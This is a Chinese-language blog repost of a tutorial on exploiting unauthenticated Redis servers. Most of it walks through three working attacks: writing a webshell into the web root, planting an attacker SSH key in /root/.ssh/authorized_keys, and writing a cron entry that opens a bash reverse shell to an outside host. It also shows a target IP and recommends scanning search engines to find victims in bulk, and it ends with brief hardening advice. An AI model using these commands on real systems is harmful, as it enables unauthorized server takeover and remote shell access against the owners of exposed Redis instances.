Redis未授权访问漏洞的利用姿势

最新推荐文章于 2024-01-19 23:01:47 发布
最新推荐文章于 2024-01-19 23:01:47 发布
阅读量363 收藏
点赞数
文章标签: 数据库 运维 shell
原文链接:https://my.oschina.net/ichunqiu/blog/815871
版权

本文来自:i春秋社区

0x01 Redis简介

redis是一个key-value型数据库,信息以键对应值的关系存储在内存中,当然可以把其存储至硬盘上。项目中使用redis做任务队列的存储器可以很容易实现分布式,另外也开始流行使用redis作为session的存储器来替换传统的文件方式。在默认情况下,Redis会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis的数据。

redis的配置中,有以下几个关键的点:

dir,指定的是redis的“工作路径”,之后生成的RDB和AOF文件都会存储在这里。
dbfilename,RDB文件名,默认为“dump.rdb”
appendonly,是否开启AOF
appendfilename,AOF文件名,默认为“appendonly.aof”
appendfsync,AOF备份方式:always、everysec、no


0x02 Redis之WebShell
082720mi17yeoy5die7tzi.jpg
如果服务器存在web项目,并且你知道了系统路径,我们就可以通过如下方法来获取该服务器的webshell。
082722clkmlfu65hzylglm.jpg
即我们可以将dir设置为web目录/usr/share/nginx/html/,而dbfilename为文件名1.shell,再执行save或bgsave,则我们就可以在web目录下写入一个webshell。

0x03 Redis之SSH
攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。
首先在本地生产公私钥文件:

$ssh-keygen –t rsa


082723ynyk19ue6e4q2v62.png
然后将公钥写入 foo.txt 文件

$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt


再连接 Redis 写入文件

$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit

$ redis-cli -h 192.168.1.11

$ 192.168.1.11:6379> config set dir /root/.ssh/

OK

$ 192.168.1.11:6379> config get dir

1) "dir"

2) "/root/.ssh"

$ 192.168.1.11:6379> config set dbfilename "authorized_keys"

OK

$ 192.168.1.11:6379> save

OK


082721ws1tvvuzt3184twt.png
这样就可以成功的将自己的公钥写入 /root/.ssh 文件夹的 authotrized_keys 文件里,然后攻击者直接执行:

$ ssh –i  id_rsa [email]root@192.168.1.xxx


即可远程利用自己的私钥登录该服务器。
当然,写入的目录不限于 /root/.ssh 下的authorized_keys,也可以写入用户目录,不过 Redis 很多以 root 权限运行,所以写入 root 目录下,可以跳过猜用户的步骤。

0x04 Redis之计划任务

/var/spool/cron linux机器下默认的计划任务,开启cron的时候,linux会定时去执行里面的任务,文件名为用户名
2 redis 设置dbfilename 到上面可以直接反弹shell回来
利用方式如下:

echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/xxx.xxx.xx.120/2333 0>&1\n\n"|redis-cli -h 42.121.237.xx -x set 1

redis-cli -h 42.121.237.23                                                                                     

42.121.237.23:6379> config set dir /var/spool/cron

OK

42.121.237.23:6379> config set dbfilename root

OK

42.121.237.23:6379> save

OK

然后本机nc -lvv 2333


这种方式简单粗暴明了,连提权都省了~
具体案例参见:https://www.secpulse.com/archives/49962.html

0x05 安全建议

1.配置bind选项,限定可以连接Redis服务器的IP,修改 Redis 的默认端口6379。
2.配置认证,也就是AUTH,设置密码,密码会以明文方式保存在Redis配置文件中。
3.配置rename-command 配置项 “RENAME_CONFIG”,这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度。
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如config。
参考来源:
https://www.secpulse.com/archives/5357.html
https://www.secpulse.com/archives/40406.html
http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/
如何批量查找那??大家可以利用钟馗之眼fofa等搜索器!!】

更多安全技术、精品好文、白帽黑客大佬尽在:http://bbs.ichunqiu.com/portal.php

转载于:https://my.oschina.net/ichunqiu/blog/815871

chengman3837
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Redis授权访问漏洞利用
L18296069161的博客
01-15 156
1、利用redis写webshell 在redis-cli中写入以下命令: config set dir /var/www/html/ config set dbfilename redis.php set webshell “<?php phpinfo(); ?>” save 然后看一下目录下是否生成了一个redis.php的文件 可以看到生成了,查看一下文件的内容 在...
Redis授权访问漏洞
Venscor技术养成之路
04-11 403
自己学习简单记录下。1. 安装及介绍centos下安装及启动:#安装 yum install redis #启动 systemctl start redis.service2. 简单介绍查看开启的端口netstat -ano看到默认情况下,6379端口对所有外部IP开放。查看redis 配置文件whereis redis cat /etc/redis.conf 实际默认配置如下:可以看到,现在的re
Redis授权访问漏洞复现
yangbz123的博客
01-29 3940
Redis介绍 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新
攻防_漏洞_Redis授权
redglare的博客
01-11 1872
原文链接:http://www.cnblogs.com/bmjoker/p/9548962.html 一、漏洞简介以及危害: 1.什么是redis授权访问漏洞Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在
redis授权访问漏洞复现
最新发布
qq_46343633的博客
01-19 1925
Redis 全称 Remote DictionaryServer(即远程字典服务),它是一个基于内存(当然也可以把其存储至硬盘上,这也是写shell的必要条件之一)实现的键值型非关系(NoSQL)数据库。Redis 免费开源,其最新稳定版本是 6.2.x(2022/11/10)。常用版本包括3.0、4.0、5.0。自 Redis 诞生以来,它以其超高的性能、完美的文档和简洁易懂的源码广受好评,国内外很多大型互联网公司都在使用 Redis,比如腾讯、阿里、Twitter、Github 等等。
Redis授权访问漏洞复现与利用
bylfsj的博客
03-21 2311
一、漏洞简介以及危害: 1.什么是redis授权访问漏洞Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访...
服务器被攻击的发现和解决过程
qq_20667511的博客
01-25 1954
记一次服务器被攻击的发现和解决过程这是之前2018年左右,买阿里云服务器之后,服务器被攻击,当时的记录信息,现在整理一下出现的问题解决思路和解决过程解决思路:解决步骤:思考:为什么会出现这样的脚本改写 /root/.ssh/authorized_keys通过redis日志实现的但是需要注意的是:总结: 这是之前2018年左右,买阿里云服务器之后,服务器被攻击,当时的记录信息,现在整理一下 出现的问题 服务器的用户进程一直处于100%的使用 通过ps -ef ,查看进程,并发现异常(可能是自己没注意到),
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
unauthorized-check:扫描常见授权访问redis,mongodb,memcached,elasticsearch,zookeeper,ftp,CouchDB,docker,Hadoop)
03-08
授权的检查 扫描以下常见授权访问 redis、mongodb、memcached、elasticsearch、zookeeper、ftp、CouchDB、docker、Hadoop 安装 pip3 install -r requirements.txt -i https://mirrors.aliyun.com/pypi/simple/ 使用说明 python3 unauthorized-check.py url.txt
redis安全配置基线.xlsx
05-24
redis安全配置基线.xlsx
redis授权访问
guxiaoguo的博客
12-27 1万+
本篇主要从redis授权访问入手,还原一些黑客的攻击场景,介绍一些常用的攻击方法和安全知识。 应用介绍 漏洞介绍 测试环境 说明攻击方法 redis日志 修复方案 作者:悦潺@安全之光 一. 应用介绍   Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、 Key-Value数
redis】验证redis是否正常运行以及报错解决方案
一起加油吧
04-11 2906
如果您在应用程序中使用 Redis 客户端库(如 Jedis、StackExchange.Redis 等),则可以编写一个简单的程序来测试 Redis 是否能够正常工作。” 错误,意味着客户端尝试向 Redis 服务器发送命令,但提供身份验证或提供的身份验证信息不正确。如果已经进行了身份验证,但仍然出现此错误,请检查是否已正确输入了密码,并且密码是否与 Redis 配置文件中设置的一致。如果上述步骤无法解决问题,则可能需要进一步检查 Redis 的配置、网络等方面的问题。Redis 出现 “
Redis授权访问利用总结
2ed
10-09 1645
漏洞概述 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。 漏洞...
记一次内网靶机实战
千寻的博客
11-05 1922
记一次内网靶机实战记录,1、shiro反序列化漏洞 2、strut2漏洞 3、Drupal漏洞 4、内网代理工具 5、数据库连接工具 6、window的samba漏洞 7、viper的使用
redis 安全漏洞导致服务器被攻击
Golden_lion的博客
03-01 3883
近日发现redis数据无故被清,恢复后连续几次还是被清,由于经验不足,一直认为是自己配置有误。经过多天查找,才发现2015年11月份爆发了redis安全漏洞攻击事件,一一印证了下,全部中招。 特点: 1.redis缓存被清0;而且每天会执行一次; 2./root/.ssh/ 下多了几个文件。dump.rdb, foo.txt, authorized_keys里多了莫名
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 5406
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
redis文件中的dump.rdb文件
热门推荐
AAAhxz的博客
10-15 2万+
dump.rdb是由Redis服务器自动生成的 默认情况下 每隔一段时间redis服务器程序会自动对数据库做一次遍历,把内存快照写在一个叫做“dump.rdb”的文件里,这个持久化机制叫做SNAPSHOT。有了SNAPSHOT后,如果服务器宕机,重新启动redis服务器程序时redis会自动加载dump.rdb,将数据库状态恢复到上一次做SNAPSHOT时的状态。 至于多久做一次SNAPSHOT,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值